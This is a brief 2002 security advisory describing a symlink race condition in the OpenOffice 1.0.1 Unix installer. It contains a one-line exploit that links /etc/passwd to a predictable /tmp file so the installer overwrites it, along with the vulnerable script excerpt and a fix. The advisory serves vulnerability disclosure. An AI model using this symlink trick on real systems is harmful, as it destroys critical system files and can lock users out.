======OpenOffice 1.0.1 Race Condition During Installation====== //9/9/02//

**Summary:** OpenOffice 1.0.1 Race condition during installation can overwrite system files.

**Severity:** Low

**Description:** A very simple and easy to exploit race condition exist during the installation of OpenOffice. During this window a malicous user could create a symlink in /tmp and overwrite arbitrary files.

**Exploit:**

As a normal user:

lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

will result in the password file being over written with:

# create the proper autoresponse file
<file>
cat << EOF > /tmp/${USER}autoresponse.conf [ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo
home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>

[JAVA]
JavaSupport=preinstalled_or_none

EOF
</file>
**Fix:**
Create a directory under /tmp to work from. With restrictive permissions.

**References:**

http://www.openoffice.org/dev_docs/source/1.0.1/index.html

I happend to find this bug with my crude kernel patch at http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

Larry W. Cashdollar
lwc@vapid.ath.cx
http://vapid.ath.cx